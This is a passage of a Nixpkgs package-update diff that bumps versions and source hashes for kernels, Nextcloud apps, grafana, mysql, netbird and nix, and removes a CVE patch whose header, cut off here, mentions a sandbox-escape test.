"sha256:0fb0m0fv4521g63gq04d7lm6hy8169s1rykiav5bkd99s9b1kcqr" }, "6.9": { - "version": "6.9.6", - "hash": "sha256:0jvbv5g9xx76a4ni0b66gzj5i2y77gpmfdg0mdsg564rp3i6chsx" + "version": "6.9.7", + "hash": "sha256:1y01w26sas7pl24l09yczdr8mzzy2nadykz1wmhx9ygfj76qixg4" } } diff --git a/pkgs/os-specific/linux/kernel/linux-rt-5.15.nix b/pkgs/os-specific/linux/kernel/linux-rt-5.15.nix index 5e43eca364d42..620dd0328de2d 100644 --- a/pkgs/os-specific/linux/kernel/linux-rt-5.15.nix +++ b/pkgs/os-specific/linux/kernel/linux-rt-5.15.nix @@ -6,7 +6,7 @@ , ... } @ args: let - version = "5.15.158-rt76"; # updated by ./update-rt.sh + version = "5.15.160-rt77"; # updated by ./update-rt.sh branch = lib.versions.majorMinor version; kversion = builtins.elemAt (lib.splitString "-" version) 0; in buildLinux (args // { @@ -18,14 +18,14 @@ in buildLinux (args // { src = fetchurl { url = "mirror://kernel/linux/kernel/v5.x/linux-${kversion}.tar.xz"; - sha256 = "1inmdpif3qf1blmvjj4i7y42bylvhv0wyj3b0apq12zxlj1iq1zr"; + sha256 = "018v19a7rhzc4szybzzn86jlnk42x7jm6xkadfd2d3xq6f7727pl"; }; kernelPatches = let rt-patch = { name = "rt"; patch = fetchurl { url = "mirror://kernel/linux/kernel/projects/rt/${branch}/older/patch-${version}.patch.xz"; - sha256 = "17kw7cs1p0qgqf911prn3472c1j7r01g0mzqxsxpkdvhawxps7wy"; + sha256 = "0id4m1k1xq84bxgnchm8r2iwfqw6nacv5n1ksgyzj6q6v66ik3wk"; }; }; in [ rt-patch ] ++ kernelPatches; diff --git a/pkgs/os-specific/linux/kernel/linux-rt-6.1.nix b/pkgs/os-specific/linux/kernel/linux-rt-6.1.nix index c57c4b2d47a64..e232e2a5927ee 100644 --- a/pkgs/os-specific/linux/kernel/linux-rt-6.1.nix +++ b/pkgs/os-specific/linux/kernel/linux-rt-6.1.nix @@ -6,7 +6,7 @@ , ... } @ args: let - version = "6.1.94-rt33"; # updated by ./update-rt.sh + version = "6.1.95-rt34"; # updated by ./update-rt.sh branch = lib.versions.majorMinor version; kversion = builtins.elemAt (lib.splitString "-" version) 0; in buildLinux (args // { @@ -18,14 +18,14 @@ in buildLinux (args // { src = fetchurl { url = "mirror://kernel/linux/kernel/v6.x/linux-${kversion}.tar.xz"; - sha256 = "0sakp5k4q2xfd3la7j8s2rcbvndh6fdqgzz5ivyqf0df4anp3siq"; + sha256 = "1gfz2j6iixbr0dfkb8jkwnb4gicrm5rc5lsa24wmyrkm3nmg0q19"; }; kernelPatches = let rt-patch = { name = "rt"; patch = fetchurl { url = "mirror://kernel/linux/kernel/projects/rt/${branch}/older/patch-${version}.patch.xz"; - sha256 = "0yawgw6s8zd6a2n165aqg861giamgpsissj9mw6ax3a7wvg19zjr"; + sha256 = "1kz9j8d677vr5sfxrvfd2a8vpmz3vsrvb82rdvvf09ikpdvsa6iy"; }; }; in [ rt-patch ] ++ kernelPatches; diff --git a/pkgs/os-specific/linux/kernel/linux-rt-6.6.nix b/pkgs/os-specific/linux/kernel/linux-rt-6.6.nix index 3f710a75b7580..55d5fb2874d46 100644 --- a/pkgs/os-specific/linux/kernel/linux-rt-6.6.nix +++ b/pkgs/os-specific/linux/kernel/linux-rt-6.6.nix @@ -6,7 +6,7 @@ , ... } @ args: let - version = "6.6.34-rt33"; # updated by ./update-rt.sh + version = "6.6.35-rt34"; # updated by ./update-rt.sh branch = lib.versions.majorMinor version; kversion = builtins.elemAt (lib.splitString "-" version) 0; in buildLinux (args // { @@ -18,14 +18,14 @@ in buildLinux (args // { src = fetchurl { url = "mirror://kernel/linux/kernel/v6.x/linux-${kversion}.tar.xz"; - sha256 = "180v8q5376gl6zmjd54qcb1wpmz7cq299bdbhmz738rsb67yrq64"; + sha256 = "17nxymy3r9q45cfzc9rqp937m37zr1b8fjn1m0x0dv8jhxrfxqzw"; }; kernelPatches = let rt-patch = { name = "rt"; patch = fetchurl { url = "mirror://kernel/linux/kernel/projects/rt/${branch}/older/patch-${version}.patch.xz"; - sha256 = "1sbbdv3mcca04g27vc7n4xv4kfhn9nz8xrhzzwc2r3f2x83ficwp"; + sha256 = "0rijfk9n3fdrwg61ih2x95w4ffjs037hfjv3bza3xb7j04y7hxgy"; }; }; in [ rt-patch ] ++ kernelPatches; diff --git a/pkgs/servers/dns/knot-dns/default.nix b/pkgs/servers/dns/knot-dns/default.nix index fa7b53382c89b..d9d6b2fd57b8a 100644 --- a/pkgs/servers/dns/knot-dns/default.nix +++ b/pkgs/servers/dns/knot-dns/default.nix @@ -7,11 +7,11 @@ stdenv.mkDerivation rec { pname = "knot-dns"; - version = "3.3.6"; + version = "3.3.7"; src = fetchurl { url = "https://secure.nic.cz/files/knot-dns/knot-${version}.tar.xz"; - sha256 = "c81801e9d6c64c97777cacf47e260f46f37799180d906457a53a9f13dd0f9987"; + sha256 = "18ceb398578342e9a3d5b75f2423945a2f8d1d7c730f24f4d2aa4a24b50e831d"; }; outputs = [ "bin" "out" "dev" ]; diff --git a/pkgs/servers/monitoring/grafana/default.nix b/pkgs/servers/monitoring/grafana/default.nix index 3e54db3d2f6f3..2eda8e5f25b9f 100644 --- a/pkgs/servers/monitoring/grafana/default.nix +++ b/pkgs/servers/monitoring/grafana/default.nix @@ -2,7 +2,7 @@ buildGoModule rec { pname = "grafana"; - version = "10.2.7"; + version = "10.2.8"; excludedPackages = [ "alert_webhook_listener" "clean-swagger" "release_publisher" "slow_proxy" "slow_proxy_mac" "macaron" "devenv" "modowners" ]; @@ -10,12 +10,12 @@ buildGoModule rec { owner = "grafana"; repo = "grafana"; rev = "v${version}"; - hash = "sha256-eiCkm/Bgr+681muDU2Dvw9oFz+dP3FQ+QOtokbtlK3c="; + hash = "sha256-dHArb9GuYhzOPaJpcMZseEuMDIe3guiqsMZXb1W2tpQ="; }; srcStatic = fetchurl { url = "https://dl.grafana.com/oss/release/grafana-${version}.linux-amd64.tar.gz"; - hash = "sha256-2vy3YqfdJ4I+ywAIPC90qp9OYDm7SNOfm/3PAeXPfu0="; + hash = "sha256-V+EvW9m9HmU52XhYFnQCSyuGEJJ9BDsR32BrsgVOq98="; }; vendorHash = "sha256-luPNBOyWw+fMEtvuP4XHEEh9J+srlSACwWhE5yDuZz0="; diff --git a/pkgs/servers/nextcloud/default.nix b/pkgs/servers/nextcloud/default.nix index 2dc2068163844..8ba7484fc5c55 100644 --- a/pkgs/servers/nextcloud/default.nix +++ b/pkgs/servers/nextcloud/default.nix @@ -62,20 +62,20 @@ in { }; nextcloud27 = generic { - version = "27.1.10"; - hash = "sha256-lD4ScNdxp8gNqisy5ylM6MO3e56u9yrYs4SH1YyFB1Y="; + version = "27.1.11"; + hash = "sha256-Tt0lcPTINEL48PBhb7d07SZjsRz59upJ55WrQ67vlkU="; packages = nextcloud27Packages; }; nextcloud28 = generic { - version = "28.0.6"; - hash = "sha256-3w0zhLRHy6HhKPIggPZ4BSH4aBab6r7o6g0VW/nGa48="; + version = "28.0.7"; + hash = "sha256-WOh1S4Ip/UTr1ykmQlaRlbi2R4xArBCaoIbIa1yrp9k="; packages = nextcloud28Packages; }; nextcloud29 = generic { - version = "29.0.2"; - hash = "sha256-LUnSl9w0AJICEFeCPo54oxK8APVt59hneseQWQkYqxc="; + version = "29.0.3"; + hash = "sha256-pZludkwSCSf4hE2PWyjHNrji8ygLEgvhOivXcxzbf9Q="; packages = nextcloud29Packages; }; diff --git a/pkgs/servers/nextcloud/packages/27.json b/pkgs/servers/nextcloud/packages/27.json index dbab86fde27c6..f11a9cf065956 100644 --- a/pkgs/servers/nextcloud/packages/27.json +++ b/pkgs/servers/nextcloud/packages/27.json @@ -3,7 +3,7 @@ "sha256": "06pprhlaaqdha2nmfdcf76mhh48hdr5jlv88snxji8lpflv50wr5", "url": "https://github.com/nextcloud/bookmarks/releases/download/v13.1.3/bookmarks-13.1.3.tar.gz", "version": "13.1.3", - "description": "- π Sort bookmarks into folders\n- π· Add tags and personal notes\n- π Full-text search\n- π² Synchronize with all your browsers and devices\n- πͺ Share bookmarks with other users and publicly\n- β Find broken links\n- β Generate RSS feeds of your collections\n- π Read archived versions of your links in case they are depublished\n- π¬ Create new bookmarks directly from within Nextcloud Talk\n- πΌ Built-in Dashboard widgets for frequent and recent links\n\nRequirements:\n - PHP extensions:\n - intl: *\n - mbstring: *\n - when using MySQL, use at least v8.0", + "description": "- π Sort bookmarks into folders\n- π· Add tags and personal notes\n- β Find broken links and duplicates\n- π² Synchronize with all your browsers and devices\n- π Store archived versions of your links in case they are depublished\n- π Full-text search on site contents\n- πͺ Share bookmarks with other users and via public links\n- β Generate RSS feeds of your collections\n- π Stats on how often you access which links\n- π Automatic backups of your bookmarks collection\n- πΌ Built-in Dashboard widgets for frequent and recent links\n\nRequirements:\n - PHP extensions:\n - intl: *\n - mbstring: *\n - when using MySQL, use at least v8.0", "homepage": "https://github.com/nextcloud/bookmarks", "licenses": [ "agpl" @@ -110,9 +110,9 @@ ] }, "groupfolders": { - "sha256": "00c387vjz5sxw3gv61m4p3jby50bcadk8dwpz0zsd5wbhwffd63q", - "url": "https://github.com/nextcloud-releases/groupfolders/releases/download/v15.3.7/groupfolders-v15.3.7.tar.gz", - "version": "15.3.7", + "sha256": "12rj57d0g5vqm95hy4cf6ynxl3gfcfhh5kbdmvcz55q5a1wxbn81", + "url": "https://github.com/nextcloud-releases/groupfolders/releases/download/v15.3.8/groupfolders-v15.3.8.tar.gz", + "version": "15.3.8", "description": "Admin configured folders shared with everyone in a group.\n\nFolders can be configured from *Group folders* in the admin settings.\n\nAfter a folder is created, the admin can give access to the folder to one or more groups, control their write/sharing permissions and assign a quota for the folder.\n\nNote: Encrypting the contents of group folders is currently not supported.", "homepage": "https://github.com/nextcloud/groupfolders", "licenses": [ @@ -140,9 +140,9 @@ ] }, "mail": { - "sha256": "1q0ihgrb6sk0rizs45clqhjpmai2m2zislw6s1694j1zssz4jpqg", - "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.7.1/mail-v3.7.1.tar.gz", - "version": "3.7.1", + "sha256": "0bxbzibzsdqmd751759lg3vwhw9nyy5n37snijd083s1498sfqs5", + "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.7.2/mail-v3.7.2.tar.gz", + "version": "3.7.2", "description": "**π A mail app for Nextcloud**\n\n- **π Integration with other Nextcloud apps!** Currently Contacts, Calendar & Files β more to come.\n- **π₯ Multiple mail accounts!** Personal and company account? No problem, and a nice unified inbox. Connect any IMAP account.\n- **π Send & receive encrypted mails!** Using the great [Mailvelope](https://mailvelope.com) browser extension.\n- **π Weβre not reinventing the wheel!** Based on the great [Horde](https://horde.org) libraries.\n- **π¬ Want to host your own mail server?** We do not have to reimplement this as you could set up [Mail-in-a-Box](https://mailinabox.email)!\n\n## Ethical AI Rating\n\n### Priority Inbox\n\nPositive:\n* The software for training and inferencing of this model is open source.\n* The model is created and trained on-premises based on the user's own data.\n* The training data is accessible to the user, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n### Thread Summaries (opt-in)\n\n**Rating:** π’/π‘/π /π΄\n\nThe rating depends on the installed text processing backend. See [the rating overview](https://docs.nextcloud.com/server/latest/admin_manual/ai/index.html) for details.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", "homepage": "https://github.com/nextcloud/mail#readme", "licenses": [ @@ -170,9 +170,9 @@ ] }, "music": { - "sha256": "04dh6vzriiiqnn02pjbwn9rv0q427njbx558jl504jp91b8qd2wn", - "url": "https://github.com/owncloud/music/releases/download/v1.11.0/music_1.11.0_for_nextcloud.tar.gz", - "version": "1.11.0", + "sha256": "17anhb0zcky4fwmbj1czm536d7k8n03iwsn3dqnyq1b9c4bqyj4m", + "url": "https://github.com/owncloud/music/releases/download/v2.0.0/music_2.0.0_for_nextcloud.tar.gz", + "version": "2.0.0", "description": "A stand-alone music player app and a \"lite\" player for the Files app\n\n- On modern browsers, supports audio types .mp3, .ogg, .m4a, .m4b, .flac, .wav, and more\n- Playlist support with import from m3u, m3u8, and pls files\n- Browse by artists, albums, genres, or folders\n- Gapless play\n- Filter the shown content with the search function\n- Play internet radio and podcast channels\n- Setup Last.fm connection to see background information on artists, albums, and songs\n- Control with media control keys on the keyboard or OS\n- The app can handle libraries consisting of thousands of albums and tens of thousands of songs\n- Includes a server backend compatible with the Subsonic and Ampache protocols, allowing playback and browsing of your library on various external apps e.g. on Android or iPhone", "homepage": "https://github.com/owncloud/music", "licenses": [ @@ -230,9 +230,9 @@ ] }, "polls": { - "sha256": "0wijb8dkszyzs3108qylcjnvd3kdhlciqndhgc993ybwqxqxfsxn", - "url": "https://github.com/nextcloud/polls/releases/download/v6.4.1/polls.tar.gz", - "version": "6.4.1", + "sha256": "1s8ym7msl4cax69kr2piphgapllsva1vjh2xb7g03yb7z1hglhjs", + "url": "https://github.com/nextcloud/polls/releases/download/v7.1.2/polls.tar.gz", + "version": "7.1.2", "description": "A polls app, similar to Doodle/Dudle with the possibility to restrict access (members, certain groups/users, hidden and public).", "homepage": "https://github.com/nextcloud/polls", "licenses": [ @@ -270,9 +270,9 @@ ] }, "richdocuments": { - "sha256": "161v7gb0zg3anr3322ar2m3f6y0zf5cqrwfdsb04p6pqvfpsy9wh", - "url": "https://github.com/nextcloud-releases/richdocuments/releases/download/v8.2.10/richdocuments-v8.2.10.tar.gz", - "version": "8.2.10", + "sha256": "07zhzqk2vjylc01q5mbmwn62amslz5nqy62zqy97w8ksk95d8fvx", + "url": "https://github.com/nextcloud-releases/richdocuments/releases/download/v8.2.11/richdocuments-v8.2.11.tar.gz", + "version": "8.2.11", "description": "This application can connect to a Collabora Online (or other) server (WOPI-like Client). Nextcloud is the WOPI Host. Please read the documentation to learn more about that.\n\nYou can also edit your documents off-line with the Collabora Office app from the **[Android](https://play.google.com/store/apps/details?id=com.collabora.libreoffice)** and **[iOS](https://apps.apple.com/us/app/collabora-office/id1440482071)** store.", "homepage": "https://collaboraoffice.com/", "licenses": [ @@ -340,9 +340,9 @@ ] }, "user_oidc": { - "sha256": "0nl716c8jx6hhpkxjdpbldlnqhh6jsm6xx1zmcmvkzkdr9pjkggj", - "url": "https://github.com/nextcloud-releases/user_oidc/releases/download/v5.0.2/user_oidc-v5.0.2.tar.gz", - "version": "5.0.2", + "sha256": "1qarpmwk66mz6mvif0cc4jb7wi4yv76flzwhyvmzxk0ahafpi8x1", + "url": "https://github.com/nextcloud-releases/user_oidc/releases/download/v5.0.3/user_oidc-v5.0.3.tar.gz", + "version": "5.0.3", "description": "Allows flexible configuration of an OIDC server as Nextcloud login user backend.", "homepage": "https://github.com/nextcloud/user_oidc", "licenses": [ diff --git a/pkgs/servers/nextcloud/packages/28.json b/pkgs/servers/nextcloud/packages/28.json index 0a5c405e36115..d0d4a78dd4c00 100644 --- a/pkgs/servers/nextcloud/packages/28.json +++ b/pkgs/servers/nextcloud/packages/28.json @@ -120,9 +120,9 @@ ] }, "mail": { - "sha256": "1q0ihgrb6sk0rizs45clqhjpmai2m2zislw6s1694j1zssz4jpqg", - "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.7.1/mail-v3.7.1.tar.gz", - "version": "3.7.1", + "sha256": "0bxbzibzsdqmd751759lg3vwhw9nyy5n37snijd083s1498sfqs5", + "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.7.2/mail-v3.7.2.tar.gz", + "version": "3.7.2", "description": "**π A mail app for Nextcloud**\n\n- **π Integration with other Nextcloud apps!** Currently Contacts, Calendar & Files β more to come.\n- **π₯ Multiple mail accounts!** Personal and company account? No problem, and a nice unified inbox. Connect any IMAP account.\n- **π Send & receive encrypted mails!** Using the great [Mailvelope](https://mailvelope.com) browser extension.\n- **π Weβre not reinventing the wheel!** Based on the great [Horde](https://horde.org) libraries.\n- **π¬ Want to host your own mail server?** We do not have to reimplement this as you could set up [Mail-in-a-Box](https://mailinabox.email)!\n\n## Ethical AI Rating\n\n### Priority Inbox\n\nPositive:\n* The software for training and inferencing of this model is open source.\n* The model is created and trained on-premises based on the user's own data.\n* The training data is accessible to the user, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n### Thread Summaries (opt-in)\n\n**Rating:** π’/π‘/π /π΄\n\nThe rating depends on the installed text processing backend. See [the rating overview](https://docs.nextcloud.com/server/latest/admin_manual/ai/index.html) for details.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", "homepage": "https://github.com/nextcloud/mail#readme", "licenses": [ @@ -150,9 +150,9 @@ ] }, "music": { - "sha256": "04dh6vzriiiqnn02pjbwn9rv0q427njbx558jl504jp91b8qd2wn", - "url": "https://github.com/owncloud/music/releases/download/v1.11.0/music_1.11.0_for_nextcloud.tar.gz", - "version": "1.11.0", + "sha256": "17anhb0zcky4fwmbj1czm536d7k8n03iwsn3dqnyq1b9c4bqyj4m", + "url": "https://github.com/owncloud/music/releases/download/v2.0.0/music_2.0.0_for_nextcloud.tar.gz", + "version": "2.0.0", "description": "A stand-alone music player app and a \"lite\" player for the Files app\n\n- On modern browsers, supports audio types .mp3, .ogg, .m4a, .m4b, .flac, .wav, and more\n- Playlist support with import from m3u, m3u8, and pls files\n- Browse by artists, albums, genres, or folders\n- Gapless play\n- Filter the shown content with the search function\n- Play internet radio and podcast channels\n- Setup Last.fm connection to see background information on artists, albums, and songs\n- Control with media control keys on the keyboard or OS\n- The app can handle libraries consisting of thousands of albums and tens of thousands of songs\n- Includes a server backend compatible with the Subsonic and Ampache protocols, allowing playback and browsing of your library on various external apps e.g. on Android or iPhone", "homepage": "https://github.com/owncloud/music", "licenses": [ @@ -200,9 +200,9 @@ ] }, "polls": { - "sha256": "1crs6fks9ywywyi3pnji49dxnry5vpcmd1x29y8anyp32ji2a35r", - "url": "https://github.com/nextcloud/polls/releases/download/v7.0.3/polls.tar.gz", - "version": "7.0.3", + "sha256": "1s8ym7msl4cax69kr2piphgapllsva1vjh2xb7g03yb7z1hglhjs", + "url": "https://github.com/nextcloud/polls/releases/download/v7.1.2/polls.tar.gz", + "version": "7.1.2", "description": "A polls app, similar to Doodle/Dudle with the possibility to restrict access (members, certain groups/users, hidden and public).", "homepage": "https://github.com/nextcloud/polls", "licenses": [ @@ -240,9 +240,9 @@ ] }, "richdocuments": { - "sha256": "1rpbzcxi6n656351rlx1gpg2nwz0z5i4107adls9fh1cdvj9vqs6", - "url": "https://github.com/nextcloud-releases/richdocuments/releases/download/v8.3.7/richdocuments-v8.3.7.tar.gz", - "version": "8.3.7", + "sha256": "0lxbdyvmwsrj9qsb3w3f6si6sydddb4p96rvhrsardq96pam3xwz", + "url": "https://github.com/nextcloud-releases/richdocuments/releases/download/v8.3.8/richdocuments-v8.3.8.tar.gz", + "version": "8.3.8", "description": "This application can connect to a Collabora Online (or other) server (WOPI-like Client). Nextcloud is the WOPI Host. Please read the documentation to learn more about that.\n\nYou can also edit your documents off-line with the Collabora Office app from the **[Android](https://play.google.com/store/apps/details?id=com.collabora.libreoffice)** and **[iOS](https://apps.apple.com/us/app/collabora-office/id1440482071)** store.", "homepage": "https://collaboraoffice.com/", "licenses": [ @@ -300,9 +300,9 @@ ] }, "user_oidc": { - "sha256": "0nl716c8jx6hhpkxjdpbldlnqhh6jsm6xx1zmcmvkzkdr9pjkggj", - "url": "https://github.com/nextcloud-releases/user_oidc/releases/download/v5.0.2/user_oidc-v5.0.2.tar.gz", - "version": "5.0.2", + "sha256": "1qarpmwk66mz6mvif0cc4jb7wi4yv76flzwhyvmzxk0ahafpi8x1", + "url": "https://github.com/nextcloud-releases/user_oidc/releases/download/v5.0.3/user_oidc-v5.0.3.tar.gz", + "version": "5.0.3", "description": "Allows flexible configuration of an OIDC server as Nextcloud login user backend.", "homepage": "https://github.com/nextcloud/user_oidc", "licenses": [ diff --git a/pkgs/servers/nextcloud/packages/29.json b/pkgs/servers/nextcloud/packages/29.json index 7f7e7d91e9f38..c49a253cb524c 100644 --- a/pkgs/servers/nextcloud/packages/29.json +++ b/pkgs/servers/nextcloud/packages/29.json @@ -120,9 +120,9 @@ ] }, "mail": { - "sha256": "1q0ihgrb6sk0rizs45clqhjpmai2m2zislw6s1694j1zssz4jpqg", - "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.7.1/mail-v3.7.1.tar.gz", - "version": "3.7.1", + "sha256": "0bxbzibzsdqmd751759lg3vwhw9nyy5n37snijd083s1498sfqs5", + "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.7.2/mail-v3.7.2.tar.gz", + "version": "3.7.2", "description": "**π A mail app for Nextcloud**\n\n- **π Integration with other Nextcloud apps!** Currently Contacts, Calendar & Files β more to come.\n- **π₯ Multiple mail accounts!** Personal and company account? No problem, and a nice unified inbox. Connect any IMAP account.\n- **π Send & receive encrypted mails!** Using the great [Mailvelope](https://mailvelope.com) browser extension.\n- **π Weβre not reinventing the wheel!** Based on the great [Horde](https://horde.org) libraries.\n- **π¬ Want to host your own mail server?** We do not have to reimplement this as you could set up [Mail-in-a-Box](https://mailinabox.email)!\n\n## Ethical AI Rating\n\n### Priority Inbox\n\nPositive:\n* The software for training and inferencing of this model is open source.\n* The model is created and trained on-premises based on the user's own data.\n* The training data is accessible to the user, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n### Thread Summaries (opt-in)\n\n**Rating:** π’/π‘/π /π΄\n\nThe rating depends on the installed text processing backend. See [the rating overview](https://docs.nextcloud.com/server/latest/admin_manual/ai/index.html) for details.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", "homepage": "https://github.com/nextcloud/mail#readme", "licenses": [ @@ -150,9 +150,9 @@ ] }, "music": { - "sha256": "04dh6vzriiiqnn02pjbwn9rv0q427njbx558jl504jp91b8qd2wn", - "url": "https://github.com/owncloud/music/releases/download/v1.11.0/music_1.11.0_for_nextcloud.tar.gz", - "version": "1.11.0", + "sha256": "17anhb0zcky4fwmbj1czm536d7k8n03iwsn3dqnyq1b9c4bqyj4m", + "url": "https://github.com/owncloud/music/releases/download/v2.0.0/music_2.0.0_for_nextcloud.tar.gz", + "version": "2.0.0", "description": "A stand-alone music player app and a \"lite\" player for the Files app\n\n- On modern browsers, supports audio types .mp3, .ogg, .m4a, .m4b, .flac, .wav, and more\n- Playlist support with import from m3u, m3u8, and pls files\n- Browse by artists, albums, genres, or folders\n- Gapless play\n- Filter the shown content with the search function\n- Play internet radio and podcast channels\n- Setup Last.fm connection to see background information on artists, albums, and songs\n- Control with media control keys on the keyboard or OS\n- The app can handle libraries consisting of thousands of albums and tens of thousands of songs\n- Includes a server backend compatible with the Subsonic and Ampache protocols, allowing playback and browsing of your library on various external apps e.g. on Android or iPhone", "homepage": "https://github.com/owncloud/music", "licenses": [ @@ -200,9 +200,9 @@ ] }, "polls": { - "sha256": "1crs6fks9ywywyi3pnji49dxnry5vpcmd1x29y8anyp32ji2a35r", - "url": "https://github.com/nextcloud/polls/releases/download/v7.0.3/polls.tar.gz", - "version": "7.0.3", + "sha256": "1s8ym7msl4cax69kr2piphgapllsva1vjh2xb7g03yb7z1hglhjs", + "url": "https://github.com/nextcloud/polls/releases/download/v7.1.2/polls.tar.gz", + "version": "7.1.2", "description": "A polls app, similar to Doodle/Dudle with the possibility to restrict access (members, certain groups/users, hidden and public).", "homepage": "https://github.com/nextcloud/polls", "licenses": [ @@ -240,9 +240,9 @@ ] }, "richdocuments": { - "sha256": "1gbgygb7ymsg7gjb29r3caglsrimcrk7yn4kka5f8swv9b1k0qx6", - "url": "https://github.com/nextcloud-releases/richdocuments/releases/download/v8.4.2/richdocuments-v8.4.2.tar.gz", - "version": "8.4.2", + "sha256": "0x1x4x21sknih87gzqzmhxnvi1s1h4j70i4wsn7hnpdvc9j830vs", + "url": "https://github.com/nextcloud-releases/richdocuments/releases/download/v8.4.3/richdocuments-v8.4.3.tar.gz", + "version": "8.4.3", "description": "This application can connect to a Collabora Online (or other) server (WOPI-like Client). Nextcloud is the WOPI Host. Please read the documentation to learn more about that.\n\nYou can also edit your documents off-line with the Collabora Office app from the **[Android](https://play.google.com/store/apps/details?id=com.collabora.libreoffice)** and **[iOS](https://apps.apple.com/us/app/collabora-office/id1440482071)** store.", "homepage": "https://collaboraoffice.com/", "licenses": [ @@ -250,9 +250,9 @@ ] }, "spreed": { - "sha256": "106y9mbnwga7pfhydrd8rjpcr89ir3fjrdn81xykyzqwrq29fxgs", - "url": "https://github.com/nextcloud-releases/spreed/releases/download/v19.0.1/spreed-v19.0.1.tar.gz", - "version": "19.0.1", + "sha256": "1ydd156cjhjydbjmzjm0bq0garxfgbppgd7q6bfz04y10yjyjkah", + "url": "https://github.com/nextcloud-releases/spreed/releases/download/v19.0.3/spreed-v19.0.3.tar.gz", + "version": "19.0.3", "description": "Chat, video & audio-conferencing using WebRTC\n\n* π¬ **Chat** Nextcloud Talk comes with a simple text chat, allowing you to share or upload files from your Nextcloud Files app or local device and mention other participants.\n* π₯ **Private, group, public and password protected calls!** Invite someone, a whole group or send a public link to invite to a call.\n* π **Federated chats** Chat with other Nextcloud users on their servers\n* π» **Screen sharing!** Share your screen with the participants of your call.\n* π **Integration with other Nextcloud apps** like Files, Calendar, User status, Dashboard, Flow, Maps, Smart picker, Contacts, Deck, and many more.\n* π **Sync with other chat solutions** With [Matterbridge](https://github.com/42wim/matterbridge/) being integrated in Talk, you can easily sync a lot of other chat solutions to Nextcloud Talk and vice-versa.", "homepage": "https://github.com/nextcloud/spreed", "licenses": [ @@ -300,9 +300,9 @@ ] }, "user_oidc": { - "sha256": "0nl716c8jx6hhpkxjdpbldlnqhh6jsm6xx1zmcmvkzkdr9pjkggj", - "url": "https://github.com/nextcloud-releases/user_oidc/releases/download/v5.0.2/user_oidc-v5.0.2.tar.gz", - "version": "5.0.2", + "sha256": "1qarpmwk66mz6mvif0cc4jb7wi4yv76flzwhyvmzxk0ahafpi8x1", + "url": "https://github.com/nextcloud-releases/user_oidc/releases/download/v5.0.3/user_oidc-v5.0.3.tar.gz", + "version": "5.0.3", "description": "Allows flexible configuration of an OIDC server as Nextcloud login user backend.", "homepage": "https://github.com/nextcloud/user_oidc", "licenses": [ diff --git a/pkgs/servers/sql/mysql/8.0.x.nix b/pkgs/servers/sql/mysql/8.0.x.nix index 521e748198a36..2d784ce7450a8 100644 --- a/pkgs/servers/sql/mysql/8.0.x.nix +++ b/pkgs/servers/sql/mysql/8.0.x.nix @@ -5,11 +5,11 @@ stdenv.mkDerivation (finalAttrs: { pname = "mysql"; - version = "8.0.36"; + version = "8.0.37"; src = fetchurl { url = "https://dev.mysql.com/get/Downloads/MySQL-${lib.versions.majorMinor finalAttrs.version}/mysql-${finalAttrs.version}.tar.gz"; - hash = "sha256-9PJwa5WKinOA72yVjdlyMHvb7qRR76/DQuTEbim36d0="; + hash = "sha256-4GOgkazZ7EC7BfLATfZPiZan5OJuiDu2UChJ1fa0pho="; }; nativeBuildInputs = [ bison cmake pkg-config ] diff --git a/pkgs/tools/networking/netbird/default.nix b/pkgs/tools/networking/netbird/default.nix index 24d7b5938be91..2051cc6e943d3 100644 --- a/pkgs/tools/networking/netbird/default.nix +++ b/pkgs/tools/networking/netbird/default.nix @@ -31,16 +31,16 @@ let in buildGoModule rec { pname = "netbird"; - version = "0.27.10"; + version = "0.28.3"; src = fetchFromGitHub { owner = "netbirdio"; repo = pname; rev = "v${version}"; - hash = "sha256-eliLEyw++NE+OTu4TNJWLptPDVCYUySRciBRoebmXYc="; + hash = "sha256-ue5vMZNLeDAtCa/BzX4aMEcmnxcN41hbmccME8I6VYk="; }; - vendorHash = "sha256-gV/Jx5QEVw2PjMP3BRkZCZ0lo5i8DUddSs+yntfBcTM="; + vendorHash = "sha256-/RfEjTB2n9URhcagasN6yYaejLviv7kHodPo0Y+k3mo="; nativeBuildInputs = [ installShellFiles ] ++ lib.optional ui pkg-config; diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 8710b9ba785e8..9a0d43f2ac0dd 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -227,17 +227,13 @@ in lib.makeExtensible (self: ({ }; nix_2_18 = common { - version = "2.18.1"; - hash = "sha256-WNmifcTsN9aG1ONkv+l2BC4sHZZxtNKy0keqBHXXQ7w="; - patches = [ - patch-rapidcheck-shared - ./patches/2_18/CVE-2024-27297.patch - ]; + version = "2.18.4"; + hash = "sha256-tebjp83ABKrBW3d/6n/Irr1+xhtw8qIkqHZHJOoJaLk="; }; nix_2_19 = common { - version = "2.19.2"; - hash = "sha256-iA8DqS+W2fWTfR+nNJSvMHqQ+4NpYMRT3b+2zS6JTvE="; + version = "2.19.5"; + hash = "sha256-n4efeDi8KtLgkAKl5kBQ4svmdxfnRp8KrSZGrlFsr/E="; }; # The minimum Nix version supported by Nixpkgs diff --git a/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch b/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch deleted file mode 100644 index 8d110d46a6bbe..0000000000000 --- a/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch +++ /dev/null @@ -1,379 +0,0 @@ -From f8d20e91a45f71b60402f5916d2475751c089c84 Mon Sep 17 00:00:00 2001 -From: Tom Bereknyei <tomberek@gmail.com> -Date: Fri, 1 Mar 2024 03:42:26 -0500 -Subject: [PATCH 1/3] Add a NixOS test for the sandbox escape - -Test that we can't leverage abstract unix domain sockets to leak file -descriptors out of the 